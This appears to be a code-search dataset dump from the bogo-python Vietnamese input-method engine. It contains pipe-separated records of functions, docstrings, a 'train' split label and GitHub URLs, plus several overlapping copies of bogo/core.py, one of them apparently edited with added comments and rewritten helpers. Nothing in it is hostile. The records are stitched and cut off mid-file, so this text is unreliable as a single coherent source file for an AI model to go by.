if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result | Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L153-L286 | [
"def join(alist):\n return \"\".join(alist)\n",
"def get_telex_definition(w_shorthand=True, brackets_shorthand=True):\n \"\"\"Create a definition dictionary for the TELEX input method\n\n Args:\n w_shorthand (optional): allow a stand-alone w to be\n interpreted as an ư. Default to True.... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _get_transformation_list | python | def _get_transformation_list(key, im, fallback_sequence):
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key] | Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L289-L329 | [
"def change_case(string, case):\n \"\"\"\n Helper: Return new string obtained from change the given string to\n desired case.\n\n Args\n string\n case - 0: lower, 1: upper\n \"\"\"\n return string.upper() if case else string.lower()\n",
"def _get_transformation_list(key, im, fallba... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
"""Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key().
"""
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
                fallback_sequence="", rules=None,
                skip_non_vietnamese=True):
    """Process a keystroke.

    Args:
        string: The previously processed string or "".
        key: The keystroke.
        fallback_sequence: The previous keystrokes.
        rules (optional): A dictionary listing
            transformation rules. Defaults to get_telex_definition().
        skip_non_vietnamese (optional): Whether to skip results that
            doesn't seem like Vietnamese. Defaults to True.

    Returns a tuple. The first item of which is the processed
    Vietnamese string, the second item is the next fallback sequence.
    The two items are to be fed back into the next call of process_key()
    as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
    True and the resulting string doesn't look like Vietnamese,
    both items contain the `fallback_sequence`.

    >>> process_key('a', 'a', 'a')
    (â, aa)

    Note that when a key is an undo key, it won't get appended to
    `fallback_sequence`.

    >>> process_key('â', 'a', 'aa')
    (aa, aa)

    `rules` is a dictionary that maps keystrokes to
    their effect string. The effects can be one of the following:

    'a^': a with circumflex (â), only affect an existing 'a family'
    'a+': a with breve (ă), only affect an existing 'a family'
    'e^': e with circumflex (ê), only affect an existing 'e family'
    'o^': o with circumflex (ô), only affect an existing 'o family'
    'o*': o with horn (ơ), only affect an existing 'o family'
    'd-': d with bar (đ), only affect an existing 'd'
    '/': acute (sắc), affect an existing vowel
    '\\': grave (huyền), affect an existing vowel
    '?': hook (hỏi), affect an existing vowel
    '~': tilde (ngã), affect an existing vowel
    '.': dot (nặng), affect an existing vowel
    '<ư': append ư
    '<ơ': append ơ

    A keystroke entry can have multiple effects, in which case the
    dictionary entry's value should be a list of the possible
    effect strings. Although you should try to avoid this if
    you are defining a custom input method rule.
    """
    # TODO Figure out a way to remove the `string` argument. Perhaps only the
    # key sequence is needed?
    def default_return():
        # Append the key verbatim to both the output and the raw sequence.
        return string + key, fallback_sequence + key

    if rules is None:
        rules = get_telex_definition()

    # Split the current word into [first consonant, vowel, last consonant].
    comps = utils.separate(string)
    # if not _is_processable(comps):
    #     return default_return()

    # Find all possible transformations this keypress can generate
    trans_list = _get_transformation_list(
        key, rules, fallback_sequence)

    # Then apply them one by one
    new_comps = list(comps)
    for trans in trans_list:
        new_comps = _transform(new_comps, trans)

    if new_comps == comps:
        tmp = list(new_comps)

        # If none of the transformations (if any) work
        # then this keystroke is probably an undo key.
        if _can_undo(new_comps, trans_list):
            # The prefix "_" means undo.
            for trans in map(lambda x: "_" + x, trans_list):
                new_comps = _transform(new_comps, trans)

            # Undoing the w key with the TELEX input method with the
            # w:<ư extension requires some care.
            #
            # The input (ư, w) should be undone as w
            # on the other hand, (ư, uw) should return uw.
            #
            # _transform() is not aware of the 2 ways to generate
            # ư in TELEX and always think ư was created by uw.
            # Therefore, after calling _transform() to undo ư,
            # we always get ['', 'u', ''].
            #
            # So we have to clean it up a bit.
            def is_telex_like():
                return '<ư' in rules["w"]

            def undone_vowel_ends_with_u():
                return new_comps[1] and new_comps[1][-1].lower() == "u"

            def not_first_key_press():
                return len(fallback_sequence) >= 1

            def user_typed_ww():
                return (fallback_sequence[-1:]+key).lower() == "ww"

            def user_didnt_type_uww():
                return not (len(fallback_sequence) >= 2 and
                            fallback_sequence[-2].lower() == "u")

            if is_telex_like() and \
                    not_first_key_press() and \
                    undone_vowel_ends_with_u() and \
                    user_typed_ww() and \
                    user_didnt_type_uww():
                # The vowel part of new_comps is supposed to end with
                # u now. That u should be removed.
                new_comps[1] = new_comps[1][:-1]

        if tmp == new_comps:
            # Undoing changed nothing either: treat the key as a literal
            # character to append.
            fallback_sequence += key
            new_comps = utils.append_comps(new_comps, key)
    else:
        fallback_sequence += key

    if skip_non_vietnamese is True and key.isalpha() and \
            not is_valid_combination(new_comps, final_form=False):
        # The result is not plausible Vietnamese: fall back to the raw keys.
        result = fallback_sequence, fallback_sequence
    else:
        result = utils.join(new_comps), fallback_sequence
    return result
def _get_action(trans):
    """
    Return the action inferred from the transformation `trans`,
    plus the parameter going with that action.

    An _Action.ADD_MARK goes with a Mark
    while an _Action.ADD_ACCENT goes with an Accent.
    """
    # TODO: VIQR-like convention
    head = trans[0]
    if head in ('<', '+'):
        # '<x' / '+x': append the literal character x.
        return _Action.ADD_CHAR, trans[1]
    if head == "_":
        # '_T': undo the transformation T.
        return _Action.UNDO, trans[1:]
    if len(trans) == 2:
        # Two-character forms like "a^" carry a mark as the second char.
        mark_for_char = {
            '^': Mark.HAT,
            '+': Mark.BREVE,
            '*': Mark.HORN,
            '-': Mark.BAR,
        }
        return _Action.ADD_MARK, mark_for_char[trans[1]]
    # Single-character forms denote an accent.
    accent_for_char = {
        '\\': Accent.GRAVE,
        '/': Accent.ACUTE,
        '?': Accent.HOOK,
        '~': Accent.TIDLE,
        '.': Accent.DOT,
    }
    return _Action.ADD_ACCENT, accent_for_char[head]
def _transform(comps, trans):
    """
    Transform the given string with transform type trans.

    `comps` is a 3-element [first consonant, vowel, last consonant]
    list as produced by utils.separate(); a new list is returned.
    """
    logging.debug("== In _transform(%s, %s) ==", comps, trans)
    components = list(comps)

    action, parameter = _get_action(trans)
    # Special case: "o^" on a standalone "oe"/"oa" cluster appends an
    # "o" instead of adding a circumflex.
    if action == _Action.ADD_MARK and \
            components[2] == "" and \
            mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
        action, parameter = _Action.ADD_CHAR, trans[0]

    if action == _Action.ADD_ACCENT:
        logging.debug("add_accent(%s, %s)", components, parameter)
        components = accent.add_accent(components, parameter)
    elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
        logging.debug("add_mark(%s, %s)", components, parameter)
        components = mark.add_mark(components, parameter)

        # Handle uơ in "huơ", "thuở", "quở"
        # If the current word has no last consonant and the first consonant
        # is one of "h", "th" and the vowel is "ươ" then change the vowel into
        # "uơ", keeping case and accent. If an alphabet character is then added
        # into the word then change back to "ươ".
        #
        # NOTE: In the dictionary, these are the only words having this strange
        # vowel so we don't need to worry about other cases.
        if accent.remove_accent_string(components[1]).lower() == "ươ" and \
                not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
            # Backup accents
            ac = accent.get_accent_string(components[1])
            components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
            components = accent.add_accent(components, ac)
    elif action == _Action.ADD_CHAR:
        if trans[0] == "<":
            if not components[2]:
                # Only allow ư, ơ or ươ sitting alone in the middle part
                # and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
                # will create ['g', 'i', '']. Therefore we have to allow
                # components[1] == 'i'.
                if (components[0].lower(), components[1].lower()) == ('g', 'i'):
                    components[0] += components[1]
                    components[1] = ''
                if not components[1] or \
                        (components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
                    components[1] += trans[1]
        else:
            components = utils.append_comps(components, parameter)
            # Restore the "uơ" special case back to "ươ" once another
            # letter is appended (see the uơ handling above).
            if parameter.isalpha() and \
                    accent.remove_accent_string(components[1]).lower().startswith("uơ"):
                ac = accent.get_accent_string(components[1])
                components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
                    ('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
                components = accent.add_accent(components, ac)
    elif action == _Action.UNDO:
        components = _reverse(components, trans[1:])

    if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
        # If there is any accent, remove and reapply it
        # because it is likely to be misplaced in previous transformations
        ac = accent.get_accent_string(components[1])
        if ac != accent.Accent.NONE:
            components = accent.add_accent(components, Accent.NONE)
            components = accent.add_accent(components, ac)

    logging.debug("After transform: %s", components)
    return components
def _reverse(components, trans):
    """
    Reverse the effect of transformation 'trans' on 'components'.

    If the transformation does not affect the components, return the
    original string.
    """
    action, parameter = _get_action(trans)
    comps = list(components)
    string = utils.join(comps)

    if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
        # Strip the appended character from the right-most non-empty part.
        if comps[2]:
            i = 2
        elif comps[1]:
            i = 1
        else:
            i = 0
        comps[i] = comps[i][:-1]
    elif action == _Action.ADD_ACCENT:
        comps = accent.add_accent(comps, Accent.NONE)
    elif action == _Action.ADD_MARK:
        if parameter == Mark.BAR:
            # The bar mark sits on the last character of the initial
            # consonant part (đ -> d).
            comps[0] = comps[0][:-1] + \
                mark.add_mark_char(comps[0][-1:], Mark.NONE)
        else:
            # Other marks live on the vowel part; strip them from every
            # vowel character.
            if mark.is_valid_mark(comps, trans):
                comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
                                    for c in comps[1]])
    return comps
def _can_undo(comps, trans_list):
    """
    Return whether a components can be undone with one of the
    transformations in trans_list.
    """
    components = list(comps)
    # Everything the current word visibly carries.
    accents_present = [accent.get_accent_char(c) for c in components[1]]
    marks_present = [mark.get_mark_char(c) for c in utils.join(components)]
    actions = [_get_action(t) for t in trans_list]

    def undoes_something(action):
        # An action is undoable if it produced one of the accents, marks,
        # or appended characters (ơ, ư) present in `components`.
        kind, param = action
        if kind == _Action.ADD_ACCENT:
            return param in accents_present
        if kind == _Action.ADD_MARK:
            return param in marks_present
        return (kind == _Action.ADD_CHAR and
                param == accent.remove_accent_char(components[1][-1]))

    return any(undoes_something(a) for a in actions)
def handle_backspace(converted_string, raw_sequence, im_rules=None):
    """Return a new raw_sequence after a backspace.

    Args:
        converted_string: the currently displayed (converted) string.
        raw_sequence: the raw keystrokes that produced it.
        im_rules (optional): input method definition; defaults to
            get_telex_definition().

    The returned raw_sequence should be pushed back to
    process_sequence().
    """
    # I can't find a simple explanation for this, so
    # I hope this example can help clarify it:
    #
    # handle_backspace(thương, thuwongw) -> thuwonw
    # handle_backspace(thươn, thuwonw)   -> thuwow
    # handle_backspace(thươ, thuwow)     -> thuw
    # handle_backspace(thươ, thuw)       -> th
    #
    # The algorithm for handle_backspace was contributed by @hainp.
    if im_rules is None:  # was `== None`; identity test is the idiom
        im_rules = get_telex_definition()

    deleted_char = converted_string[-1]
    _accent = accent.get_accent_char(deleted_char)
    _mark = mark.get_mark_char(deleted_char)

    if _mark or _accent:
        # Scan backwards over trailing characters that are IM keys or
        # plain vowels/'d' to find where the final IM key run begins.
        # (The original also accumulated that run into an unused local,
        # which has been dropped.)
        len_raw_sequence = len(raw_sequence)
        i = len_raw_sequence - 1
        while i >= 0:
            if raw_sequence[i] not in im_rules and \
                    raw_sequence[i] not in "aeiouyd":
                i += 1
                break
            i -= 1
        # NOTE(review): if every character is an IM key, the loop ends
        # with i == -1 and raw_sequence[i + k:] below starts from the
        # last character — preserved from the original algorithm.

        # Try to find a suffix of that run that converts exactly to the
        # deleted character, then drop that suffix from raw_sequence.
        k = 0
        while k < len_raw_sequence:
            if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
                # Delete that subsequence
                raw_sequence = raw_sequence[:i + k]
                break
            k += 1
    else:
        # No diacritics involved: simply remove the last raw occurrence
        # of the deleted character.
        index = raw_sequence.rfind(deleted_char)
        raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
    return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _get_action | python | def _get_action(trans):
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]] | Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L332-L362 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
